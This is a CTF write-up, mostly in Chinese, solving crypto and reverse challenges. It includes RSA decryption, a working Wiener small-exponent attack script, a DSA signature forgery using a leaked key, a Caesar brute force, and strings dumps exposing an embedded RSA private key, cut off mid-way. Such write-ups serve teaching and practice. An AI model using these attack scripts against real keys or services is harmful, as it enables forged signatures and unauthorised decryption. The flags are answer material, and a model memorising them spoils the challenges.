00111000 01100100 01101011 00110110 01100100 00110101 01111010 00110011 01100001 01001110 01111001 01001011 01100111 01111001 01100010 01110001 00110011 00110001 01010010 01101001 01111010 01011001 01111001 01001010 00110110 01000001 00110110 01101010 01000011 01100110 00110010 01000100 01101101 01001011 01010001 01111010 01001010 01000110 01110001 00110010 01111000 01101110 01010010 01100111 01100001 01101011 01000110 01110010 01100010 00110111 01101101 01110101 00110011 01100001 00110111 00111000 01001100 00110100 01110001 01100101 01110001 01101101 01110111 00111000 01010111 01001010 01100111 01110110 01010100 01100101 01111001 01101010 01101001 01001110 01100011 01100101 01000111 00110100 01001011 01101000 01001110 01101011 01110011 01101101 01100101 00110011 01010100 01010001 01110010 01000100 00110001 01011000 00110110 01110000 01101001 01010110 01101000 01010110 01110001 01110110 01010010 01001010 01000011 01000100 00110010 01110111 01110011 00110001 00111001 01111001 01000111 01001110 01001100 01000100 01010111 01001110 01110100 01010000 01010100 01110011 01101101 01111010 01001101 01010001 01010000 01010100 01100011 01110101 01001011 00111001 00110011 01000101 01010101 00110010 01000010 01110101 01110111 01100100 01110000 01111010 01100010 01001101 01000001
1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/env python3
import sys

# 从命令行读取所有参数,合并成一个字符串
binary_text = ' '.join(sys.argv[1:])

# 转换:将每个二进制字节转换为ASCII字符
for binary_byte in binary_text.split():
if binary_byte: # 跳过空字符串
# 二进制转十进制,再转字符
print(chr(int(binary_byte, 2)), end='')
print() # 最后换行
1
2
3
4
5
The time has come to make a choice. Choose wisely, or you risk letting your heart become a newer wilderness, and the true flag may remain hidden in the shade.

VGhlIGZsYWcgaXMgWkFDVEZ7MV9jMHVsZF9oQHYzX2Iwcm5lX3RoM19TaEBkM18wZl9tQDdofTU4ISBKdXN0IGEgbGl0dGxlIGpva2UsIE13YWhhaGEhISBZb3UgbWlnaHQgbm90aWNlIHRoYXQgdGhlIGZsYWcgY29tZXMgZnJvbSBhIHBvZW0gYnkgRGlja2luc29uLCAiSGFkIEkgbm90IHNlZW4gdGhlIHN1bi4iIFRoZSBuZXh0IGxpbmVzIGdvOiAiQnV0IExpZ2h0IGEgbmV3ZXIgV2lsZGVybmVzcywgTXkgV2lsZGVybmVzcyBoYXMgbWFkZS4iIEnigJl2ZSBtYWRlIGEgc2xpZ2h0IGFsdGVyYXRpb24gdG8gdGhlIGxpbmVzLCBqdXN0IHRvIGNvbmZ1c2UgeW91ciBleWVzLiBQZXJoYXBzIHRoaXMgd2lsbCBoZWxwIHlvdSBndWVzcyB0aGUgdHJ1ZSBmbGFnPyBCdXQgaWYgeW914oCZcmUgdXAgZm9yIGEgY2hhbGxlbmdlLCBtYXliZSB5b3Ugc2hvdWxkIGxvb2sgYmFjayBjYXJlZnVsbHkgYW5kIHNlZSBpZiB0aGVyZSdzIGEgaGlkZGVuIEJhc2UgZGVjcnlwdGlvbi4gVGhlcmXigJlzIG1vcmUgdG8gZGlzY292ZXIgaW4gdGhlIG51bWJlcnMgYW5kIGxldHRlcnMsIHNlY3JldHMgd2FpdGluZyB0byBiZSB1bnZlaWxlZC4=

26FjtozsZ7R2EQAwURGXtqZDnce7XW47571icTRQNXpkSVntMh8Cjk5ppHBTeLFg1LQiWt9ZPpPtkTq8dptNxd2YQe6Y5a5kP8qWQfL8GQJTmitTEyjcr2cAr6HUyHWvzCjc8bMf8byfnP21ogQyU1QBv2HE2T9S5kqfZkjjNDMaYBS6WJQeGgF4r8R3X7bN7dHgZMGA4dm7ePu8qb78ME9iCdsbsj9cwe7h1HYAZ63HyMwzUbtAU9deVRzGwiuVC8ZwEjjeqTh9DmGtWunhK8qU4jG7hdZHcPuBqJ3qiDC9b3r6jynNKh7CxHgQZ4JTfZU5Ei7rXjJrQo8fHSQdAnRHuwA8VdYJjXBPfmt4cUzRtTtMMfNcWpsT6nU5zskXjPVuEUiFpU5MxEAVix5LBsc7XpPTitUMdue4Z5Q3UdWY4LUbpELfzf9HF5FpPwcDdEQsJshy69RwuSPxyNxGYevt6jszg4qQCSBXcUDHr4hja3XVzFLbCtqnXx8rsNhmDcukXN1pkEFGSQxrUCe47Tb7SiZ4MH8doJSGNCYfrt4NsnwecdePrMqcd6TyTKqu23QWHiPpWbts5HS8dk6d5z3aNyKgybq31RizYyJ6A6jCf2DmKQzJFq2xnRgakFrb7mu3a78L4qeqmw8WJgvTeyjiNceG4KhNksme3TQrD1X6piVhVqvRJCD2ws19yGNLDWNtPTsmzMQPTcuK93EU2BuwdpzbMA

第一段是fake:

1
The flag is ZACTF{1_c0uld_h@v3_b0rne_th3_Sh@d3_0f_m@7h}58! Just a little joke, Mwahaha!! You might notice that the flag comes from a poem by Dickinson, "Had I not seen the sun." The next lines go: "But Light a newer Wilderness, My Wilderness has made." I’ve made a slight alteration to the lines, just to confuse your eyes. Perhaps this will help you guess the true flag? But if you’re up for a challenge, maybe you should look back carefully and see if there's a hidden Base decryption. There’s more to discover in the numbers and letters, secrets waiting to be unveiled.

第二段base64解码失败,怀疑是base58:

1
2
3
4
5
6
A little RSA riddle awaits you. Crack the code, unveil the secret, and you'll discover the first line of the twisted, cryptic version of the Dickinson poem I just shared — leading you to the true flag.

p = 79366393717289094339549910346342915738036801147892841609988538737083315828633
q = 89541276936773591836074173019098253300353308346744434955546251733216891032729
e = 65537
c = 3053910251720456011590806565004747266601634289537034519459823030624390475991109095903273093242658152291715128422599392416400743433708929803291354900903421

解密即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/env python3

# RSA parameters
p = 79366393717289094339549910346342915738036801147892841609988538737083315828633
q = 89541276936773591836074173019098253300353308346744434955546251733216891032729
e = 65537
c = 3053910251720456011590806565004747266601634289537034519459823030624390475991109095903273093242658152291715128422599392416400743433708929803291354900903421

n = p * q
phi_n = (p - 1) * (q - 1)

def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)

def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m

d = modinv(e, phi_n)

# Decrypt ciphertext
m = pow(c, d, n)
print(f"Decrypted message (as integer) = {m}")

# Convert integer to bytes/ASCII
def int_to_bytes(m_int):
# Convert to hex, then to bytes
hex_str = hex(m_int)[2:] # Remove '0x' prefix
# Ensure even length
if len(hex_str) % 2 != 0:
hex_str = '0' + hex_str
return bytes.fromhex(hex_str)

# Try to decode as ASCII
msg_bytes = int_to_bytes(m)
print(f"Message in bytes: {msg_bytes}")
print(f"Message as string: {msg_bytes.decode('ascii', errors='ignore')}")

try:
# Check if the bytes themselves are hex chars
possible_hex = msg_bytes.decode('ascii')
if all(c in '0123456789abcdefABCDEF' for c in possible_hex):
print(f"Possible hex string: {possible_hex}")
# Try decoding from hex
from_hex = bytes.fromhex(possible_hex)
print(f"From hex decode: {from_hex}")
print(f"As string: {from_hex.decode('ascii', errors='ignore')}")
except:
pass

# Try common encodings
for enc in ['utf-8', 'latin-1']:
try:
print(f"Trying {enc}: {msg_bytes.decode(enc)}")
except:
continue

得到CBCTF{H@d_1_n0t_s33n_th3_L1ght_0f_CryP7o}

  • RSA_Shrimp

We intercepted an RSA-encrypted message, but it seems the sender made a critical mistake when generating the keys: the private exponent d is unusually small?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from Crypto.Util.number import *

flag = b"*********************"
m = bytes_to_long(flag)

p = getPrime(512)
q = getPrime(512)
N = p * q
phi = (p-1) * (q-1)

while True:
d = getRandomNBitInteger(100)
if GCD(d, phi) == 1:
e = inverse(d, phi)
break

c = pow(m, e, N)

print("N =", N)
print("e =", e)
print("c =", c)

# N = 83810405458629670011268195175607930776502851270019593430778113462991227653979843489021103300987730272108652551286407869238663428126312534610419471430932571715602570165775301827764412220731982754705007707697187820099680332795505670948540843105573754933647288435625741245436238428836440202278683287801421360077
# e = 44325518006091876721605823409610042252069625967882044704024214032751966871521847773994263894312607474509588371872161541972144207214032339247431102110456229841266040285615770275478438280620725262108096170791001509463685129909286120575052133129389839912877047603238192564639423047082080059345481052412519925381
# c = 73434158249386043625252431253323506682208843849831594508828737831830362719932115747428792429497868946601098023909629141071257910108747977030342842534107828613672478901354339083057876376985055292417284326608488912346944387146680464066055117328325698648200021918802428101944953998434164564886207047699320456022

尝试Wiener 攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import gmpy2
from Crypto.Util.number import long_to_bytes

N = 83810405458629670011268195175607930776502851270019593430778113462991227653979843489021103300987730272108652551286407869238663428126312534610419471430932571715602570165775301827764412220731982754705007707697187820099680332795505670948540843105573754933647288435625741245436238428836440202278683287801421360077
e = 44325518006091876721605823409610042252069625967882044704024214032751966871521847773994263894312607474509588371872161541972144207214032339247431102110456229841266040285615770275478438280620725262108096170791001509463685129909286120575052133129389839912877047603238192564639423047082080059345481052412519925381
c = 73434158249386043625252431253323506682208843849831594508828737831830362719932115747428792429497868946601098023909629141071257910108747977030342842534107828613672478901354339083057876376985055292417284326608488912346944387146680464066055117328325698648200021918802428101944953998434164564886207047699320456022

def continued_fraction(n, d):
cf = []
while d:
q, r = divmod(n, d)
cf.append(q)
n, d = d, r
return cf

def convergents(cf):
num, den = [], []
for i, q in enumerate(cf):
if i == 0:
num.append(q)
den.append(1)
elif i == 1:
num.append(q*num[-1] + 1)
den.append(q*den[-1])
else:
num.append(q*num[-1] + num[-2])
den.append(q*den[-1] + den[-2])
yield (num[-1], den[-1])

cf = continued_fraction(e, N)
for k, d in convergents(cf):
if d == 0:
continue

if d.bit_length() < 99 or d.bit_length() > 101:
continue
if (e * d - 1) % k == 0:
phi = (e * d - 1) // k

s = N - phi + 1
# p, q 是 x^2 - s*x + N = 0 的根
discriminant = s*s - 4*N
if discriminant >= 0:
sqrt_disc = gmpy2.isqrt(discriminant)
if sqrt_disc * sqrt_disc == discriminant:
p = (s + sqrt_disc) // 2
q = (s - sqrt_disc) // 2
if p * q == N:
m = pow(c, d, N)
flag = long_to_bytes(m)
print("Flag:", flag)
exit(0)

得到CBCTF{w3lc0m3_to_AES}

  • Chaos

Random, mysterious, and, well… ha! At first glance, it’s just a jumble of data and signatures. But for those willing to play, the chaos might just whisper a few secrets of its hidden order.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3
import random
from hashlib import sha1
import random
import os
import time
from hashlib import sha1
import json

# 从外部文件读取参数
with open('params.txt', 'r') as f:
params_content = f.read()
exec(params_content)

def gen_nonce():
return (random.getrandbits(32) % (q - 1)) + 1

def sign(msg: str, x: int):
k = gen_nonce()
r = pow(g, k, p) % q
hm = int.from_bytes(sha1(msg.encode()).digest(), 'big') % q
s = (pow(k, -1, q) * (hm + x * r)) % q
return r, s

if __name__ == '__main__':
import json, sys
if len(sys.argv) < 2:
print('Usage: python client.py <msg>')
sys.exit(1)

# 使用环境变量或默认值设置种子
seed_value = os.environ.get('RANDOM_SEED', 0x38F23A4C)
random.seed(seed_value)

# 生成随机消息
messages = [os.urandom(16).hex() for _ in range(700)]
special_message = "request_special_resource"
messages.append(special_message)

signatures = []
base_timestamp = int(time.time())

for i, msg in enumerate(messages):
# 生成nonce k
k_value = random.getrandbits(32) % (q - 1) + 1
r_value = pow(g, k_value, p) % q
hash_msg = int.from_bytes(sha1(msg.encode()).digest(), 'big') % q
s_value = (pow(k_value, -1, q) * (hash_msg + x * r_value)) % q

request_data = {
"method": "POST",
"path": "/api/endpoint",
"timestamp": base_timestamp + i,
"username": "SystemUser",
"data": {
"message": msg,
"signature_r": str(r_value),
"signature_s": str(s_value)
}
}
signatures.append(request_data)

with open('requests.jsonl', 'w', encoding="utf-8") as f:
for sig in signatures:
f.write(json.dumps(sig, ensure_ascii=False) + '\n')

print("Request data generated successfully")

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
# simple local verifier - reads requests.jsonl in same directory
import json,socketserver
from hashlib import sha1
import os

p = 8576266215257684451627938266209288368747290850430257232775662794860889167273173590976498454387838065099555150702527005228232224203671818388040396426167421
q = 1092510234019
g = 7144062426562178459134763982605952302933077316845461785177531950627385795442407387260745982564084210402482982761274236868248912040071369181916889827118820
y = 8291891676739439066670566927114794141859628227389282017383200710395666779939972786268373568231932748094932532880440197180527838969047845790921891292250679
FLAG = os.getenv("FLAG", "uuid{xixixixi}")

def modinv(a, m):
a = a % m
lm, hm = 1, 0
low, high = a % m, m
while low > 1:
r = high // low
nm, new = hm - lm * r, high - low * r
lm, low, hm, high = nm, new, lm, low
return lm % m

def verify(msg: str, r: int, s: int):
if not (0 < r < q and 0 < s < q):
return False
hm = int.from_bytes(sha1(msg.encode()).digest(), 'big') % q
w = modinv(s, q)
u1 = (hm * w) % q
u2 = (r * w) % q
v = ((pow(g, u1, p) * pow(y, u2, p)) % p) % q
return v == r

class Handler(socketserver.BaseRequestHandler):
def handle(self):
self.request.sendall(b"Send me JSON lines like {\"msg\":\"...\",\"r\":\"...\",\"s\":\"...\"}\n")
while True:
line = self.request.recv(4096).strip()
if not line:
break
try:
data = json.loads(line.decode())
msg = data['msg']
r = int(data['r'])
s = int(data['s'])
ok = verify(msg, r, s)
self.request.sendall(f"MSG={msg} OK={ok}\n".encode())
if ok and msg == "give_me_flag":
self.request.sendall(f"FLAG: {FLAG}\n".encode())
break
except Exception as e:
self.request.sendall(f"Error: {e}\n".encode())


if __name__ == "__main__":
server = socketserver.ThreadingTCPServer(("0.0.0.0", 12345), Handler)
server.serve_forever()

1
2
3
4
5
6
7
8
p = 8576266215257684451627938266209288368747290850430257232775662794860889167273173590976498454387838065099555150702527005228232224203671818388040396426167421
q = 1092510234019
g = 7144062426562178459134763982605952302933077316845461785177531950627385795442407387260745982564084210402482982761274236868248912040071369181916889827118820
x = 379478523492
y = 8291891676739439066670566927114794141859628227389282017383200710395666779939972786268373568231932748094932532880440197180527838969047845790921891292250679

P_bits= 512
NUM_SAMPLES:= 700
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import json
from hashlib import sha1

# 题目提供的参数
p = 8576266215257684451627938266209288368747290850430257232775662794860889167273173590976498454387838065099555150702527005228232224203671818388040396426167421
q = 1092510234019
g = 7144062426562178459134763982605952302933077316845461785177531950627385795442407387260745982564084210402482982761274236868248912040071369181916889827118820
x = 379478523492 # 已知的私钥

def modinv(a, m):
return pow(a, -1, m)

def sign_message(msg, x, p, q, g):
# 我们可以随便选一个 k,只要满足 1 <= k < q
k = 123456789

# 1. 计算 r
r = pow(g, k, p) % q

# 2. 计算消息的哈希值
hm = int.from_bytes(sha1(msg.encode()).digest(), 'big') % q

# 3. 计算 s = k^-1 * (hm + x*r) mod q
k_inv = modinv(k, q)
s = (k_inv * (hm + x * r)) % q

return r, s

# 目标消息
target_msg = "give_me_flag"
r, s = sign_message(target_msg, x, p, q, g)

# 构造发送给服务器的 JSON
payload = {
"msg": target_msg,
"r": str(r),
"s": str(s)
}

print(json.dumps(payload))

nc,发送 {“msg”: “give_me_flag”, “r”: “390893041773”, “s”: “814033672429”}

CBCTF{cd1fa9af-2c4a-4b79-a602-650a7f496f7f}

Reverse

  • Welcome

入门第一课,找到加密后的flag吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[112]; // [rsp+20h] [rbp-60h] BYREF
char v5[104]; // [rsp+90h] [rbp+10h] BYREF
char *iodj_Qrz_BrX_ILQg_Phhhhh_; // [rsp+F8h] [rbp+78h]

_main();
iodj_Qrz_BrX_ILQg_Phhhhh_ = "iodj{Qrz-BrX-ILQg-Phhhhh}";
puts_0("Welcome To The CTF World");
puts_0("This is your flag, but it needs to be decrypted.");
printf_0(&Format);
scanf("%99s", v4);
caesarEncrypt(v4, v5);
compareFlags(v5, iodj_Qrz_BrX_ILQg_Phhhhh_);
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
def caesar_bruteforce(ciphertext):
"""暴力破解凯撒密码"""
results = []

# 遍历所有可能的偏移量(1-25)
for shift in range(1, 26):
decrypted = ""

for char in ciphertext:
if char.isalpha():
# 处理大写字母
if char.isupper():
base = ord('A')
decrypted_char = chr((ord(char) - base - shift) % 26 + base)
# 处理小写字母
else:
base = ord('a')
decrypted_char = chr((ord(char) - base - shift) % 26 + base)
else:
# 非字母字符保持不变
decrypted_char = char

decrypted += decrypted_char

results.append(f"Shift {shift:2d}: {decrypted}")

return results

ciphertext = "iodj{Qrz-BrX-ILQg-Phhhhh}"

decryptions = caesar_bruteforce(ciphertext)

# 输出所有结果
for result in decryptions:
print(result)

print("=" * 50)
print("最有可能的结果(常见flag格式):")

# 查找包含 "flag{" 的结果
for result in decryptions:
if "flag{" in result.lower():
print(f" ==> {result}")

flag{Now-YoU-FINd-Meeeee}得到CBCTF{Now-YoU-FINd-Meeeee}

  • Lost_key

大嗨客的SkipShot搓了一个RSA加解密工具,把价值1000分的机密数据给加密了,为了不让别人知道,他把私钥给藏起来了。。。在严刑拷打(并非严刑)之下,他把他的工具交出来了,你能把这个机密数据还原出来吗?

试试bindiff工具~

非预期了哈,不会装插件555

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
(base) ┌──(root㉿LAPTOP-BMERJF8L)-[/mnt/e/1215]
└─# strings encryption_tool_old
/lib64/ld-linux-x86-64.so.2
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
EVP_PKEY_CTX_free
ERR_get_error
PEM_read_bio_PrivateKey
PEM_read_bio_PUBKEY
BIO_free
BIO_new_mem_buf
EVP_PKEY_decrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt
EVP_PKEY_encrypt_init
EVP_PKEY_free
EVP_PKEY_CTX_new
EVP_PKEY_CTX_set_rsa_padding
ERR_error_string
strcpy
sleep
puts
__stack_chk_fail
exit
dlclose
strlen
malloc
__libc_start_main
dlopen
__cxa_finalize
printf
__isoc99_scanf
memcpy
strcmp
libcrypto.so.3
libc.so.6
OPENSSL_3.0.0
GLIBC_2.14
GLIBC_2.7
GLIBC_2.4
GLIBC_2.34
GLIBC_2.2.5
PTE1
u+UH
<=t2
<=t+
[S]Version Checking...
[S]version: 19.198.10
[S]Welcome to the RSA encryption program!!!
[S]Tell me your ciphertext or plaintext:
[S]Ciphertext checking...
[S]Right ciphertext!
[S]Not ciphtertext
[S]Environment checking...
libcrypto.so
[S]No OpenSSL in your env!! exit
[S]OpenSSL env work
[S]Encrypting your plaintext...
[S]Decrypting your ciphertext...
[S]Error: NULL input
[S]Failed to get private key!
[S]BIO creation failed!
[S]Load private key error: %s
[S]EVP_PKEY_CTX_new error: %s
[S]EVP_PKEY_decrypt_init error: %s
[S]Set padding error: %s
[S]Get output length error: %s
[S]Malloc error!
[S]Decrypt error: %s
[S]Invalid input parameters!
[S]Failed to get public key!
[S]Load public key error: %s
[S]EVP_PKEY_encrypt_init error: %s
[S]Encrypt error: %s
[S]Warning! This version has deprecated, please updata!!
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
?456789:;<=
!"#$%&'()*+,-./0123
9*3$"
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCPsj+c/7xPr54hxUnTWHc9fxqQ
rHkZgoM3VGXTlu7C1UxLFZiWjZ0r8u6SgtFUm4qnKzgpaNRgSL22umNbdIaQCUls
mxozADlYtQ4FOCZUGuDMQe/f8TcVPIuHjIgmNfIPu1+yy4NZDnZfOf6Y7B6jKEJ4
ROfzXCKTuRWS+6pRwQIDAQAB
-----END PUBLIC KEY-----
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLVxuTUlJQ2RnSUJBREFOQmdrcWhraUc5dzBCQVFFRkFBU0NBbUF3Z2dKY0FnRUFBb0dCQUkreVA1ei92RSt2bmlIRlxuU2ROWWR6MS9HcENzZVJtQ2d6ZFVaZE9XN3NMVlRFc1ZtSmFOblN2eTdwS0MwVlNiaXFjck9DbG8xR0JJdmJhNlxuWTF0MGhwQUpTV3liR2pNQU9WaTFEZ1U0SmxRYTRNeEI3OS94TnhVOGk0ZU1pQ1kxOGcrN1g3TExnMWtPZGw4NVxuL3Bqc0hxTW9RbmhFNS9OY0lwTzVGWkw3cWxIQkFnTUJBQUVDZ1lCckFlNWxWL3cveXlRVE9mdjBLeGtBN3JvMVxucW5xMENJRDJueDhGSm95L0FtQkNPZDdibnJIQW5MUVUzdDVNQjFpRmpLWFNFSUszQVBSbU12N3lpQi83MjROcFxucVVVU2ZYVmZtekk1aituYzh2UEhEZmpDck9WTXVSZkpUcW44WS91bnY4TVcyemtzN0RiRXdrQnk5OUdTVVYvS1xuL3BGQzJGa2hhbURmUmtoZkFRSkJBTmZ2bmJ3WGk2R1g3U1BmZGxhaWtmUDl6VGlIM1JMc3NHcXlwMEEvVFVzeVxuTGhEcjNmbXVQbFFUeElkSHcxSHplUzNueWQrcjJzejJGc0s4Y09SQlNxa0NRUUNxVzNCQ25qYjZOa0tXSlJ5L1xuekwvM0s0cUQ0T2ZMQWlVTEQrWW8rY3JrQ1B2YXNpZWZmeWx0MkVsZDhPZmxvenRyWDJFVjlyNU94ODdMVXNSWlxuUzVWWkFrRUF1Y0wyQkFpUlkzdHFVeEQ3SWI2TEpzWXhGSyswbklJbnBqSjR0VWwvdWUrNk4yNWhzRmlZWUFYOVxuYkk5czFRUktQQmFKMFRScmJ5VkpJVSt4SW51VXVRSkFmUmYvNnlzNnU2azBaQVNFZytMWjQ2bzVZSFc2UDd3blxuYjJRUlltMXFxdUJkOEUxNkF3amhaeU8zWENBV2FPM2dLQXcxd21jWmY4Z0E5aFNrMGQxS29RSkFhNzVGS1dtTFxuSmhVbFdzK2tHK0tkaEVRTmtWdTBsZnh2N0Jxd2YxL0F6ZGR3QmNiTzFYckQzVmVVRmo3R21STFRMS244cXF0ZVxubHk1MnpEdm01RGx3V0E9PVxuLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0=
The ciphertext was moved///////
GCC: (Ubuntu 14.2.0-4ubuntu2~24.04) 14.2.0
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

(base) ┌──(root㉿LAPTOP-BMERJF8L)-[/mnt/e/1215]
└─# strings encryption_tool_new
/lib64/ld-linux-x86-64.so.2
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
EVP_PKEY_CTX_free
ERR_get_error
PEM_read_bio_PrivateKey
PEM_read_bio_PUBKEY
BIO_free
BIO_new_mem_buf
EVP_PKEY_decrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt
EVP_PKEY_encrypt_init
EVP_PKEY_free
EVP_PKEY_CTX_new
EVP_PKEY_CTX_set_rsa_padding
ERR_error_string
strcpy
sleep
puts
__stack_chk_fail
exit
dlclose
strlen
malloc
__libc_start_main
dlopen
__cxa_finalize
printf
__isoc99_scanf
memcpy
strcmp
libcrypto.so.3
libc.so.6
OPENSSL_3.0.0
GLIBC_2.14
GLIBC_2.7
GLIBC_2.4
GLIBC_2.34
GLIBC_2.2.5
PTE1
u+UH
<=t2
<=t+
[S]Warning! This version has deprecated, please updata!!
[S]Version Checking...
[S]version: 114.5.14 (newest)
[S]Welcome to the RSA encryption program!!!
[S]Tell me your ciphertext or plaintext:
[S]Ciphertext checking...
[S]Right ciphertext!!!!!!!!!!!!!!!!!!!!!
[S]Not ciphtertext
[S]Environment checking...
libcrypto.so
[S]No OpenSSL in your env!! exit
[S]OpenSSL env work
[S]Encrypting your plaintext...
[S]Decrypting your ciphertext...
[S]Warning!! RSA decrypt func has deprecated
[S]Error: NULL input
[S]Failed to get private key!
[S]BIO creation failed!
[S]Load private key error: %s
[S]EVP_PKEY_CTX_new error: %s
[S]EVP_PKEY_decrypt_init error: %s
[S]Set padding error: %s
[S]Get output length error: %s
[S]Malloc error!
[S]Decrypt error: %s
[S]Warning!! RSA encrypt func has deprecated
[S]Invalid input parameters!
[S]Failed to get public key!
[S]Load public key error: %s
[S]EVP_PKEY_encrypt_init error: %s
[S]Encrypt error: %s
[S]Plesase find the key and then do what you want :)
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
?456789:;<=
!"#$%&'()*+,-./0123
9*3$"
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCPsj+c/7xPr54hxUnTWHc9fxqQ
rHkZgoM3VGXTlu7C1UxLFZiWjZ0r8u6SgtFUm4qnKzgpaNRgSL22umNbdIaQCUls
mxozADlYtQ4FOCZUGuDMQe/f8TcVPIuHjIgmNfIPu1+yy4NZDnZfOf6Y7B6jKEJ4
ROfzXCKTuRWS+6pRwQIDAQAB
-----END PUBLIC KEY-----
UEtuNkI3eHo5QU0zd3d3TllablFJeDJSbkNEUUw1MlhxMU05em5CTXhCeHdSUUpKTGRhRE5RN1h5VkVhS3MvcjVyM0QyV0pTNkhKVWFwdU8yMHZFc01XRnlOdXplUUhWeHJRUkx3OHZIWFQvcGdDNWtPanZyZVJES0xnbVdlam4wa2xMUWJrQVJveDlmN1ErMXgzNzBZSUZvdUxyTlFVakpPVHlLdUdtdWtrPQ==
GCC: (Ubuntu 14.2.0-4ubuntu2~24.04) 14.2.0
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, PKCS1_v1_5
from Crypto.Hash import SHA1, SHA256
from base64 import b64decode
import binascii

# 私钥(确保格式正确)
private_key_pem = """-----BEGIN RSA PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAI+yP5z/vE+vniHF
SdNYdz1/GpCseRmCgzdUZdOW7sLVTEsVmJaNnSvy7pKC0VSbiqcrOClo1GBIvba6
Y1t0hpAJSWybGjMAOVi1DgU4JlQa4MxB79/xNxU8i4eMiCY18g+7X7LLg1kOdl85
/pjsHqMoQnhE5/NcIpO5FZL7qlHBAgMBAAECgYBrAe5lV/w/yyQTOfv0KxkA7ro1
qnq0CID2nx8FJoy/AmBCOd7bnrHAnLQU3t5MB1iFjKXSEIK3APRmMv7yiB/724Np
qUUSfXVfmzI5j+nc8vPHDfjCrOVMuRfJTqn8Y/unv8MW2zks7DbEwkBy99GSUV/K
/pFC2FkhamDfRkhfAQJBANfvnbwXi6GX7SPfdlaikfP9zTiH3RLssGqyp0A/TUsy
LhDr3fmuPlQTxIdHw1HzeS3nyd+r2sz2FsK8cORBSqkCQQCqW3BCnjb6NkKWJRy/
zL/3K4qD4OfLAiULD+Yo+crkCPvasieffylt2Eld8OfloztrX2EV9r5Ox87LUsRZ
S5VZAkEAucL2BAiRY3tqUxD7Ib6LJsYxFK+0nIInpjJ4tUl/ue+6N25hsFiYYAX9
bI9s1QRKPBaJ0TRrbyVJIU+xInuUuQJAfRf/6ys6u6k0ZASEg+LZ46o5YHW6P7wn
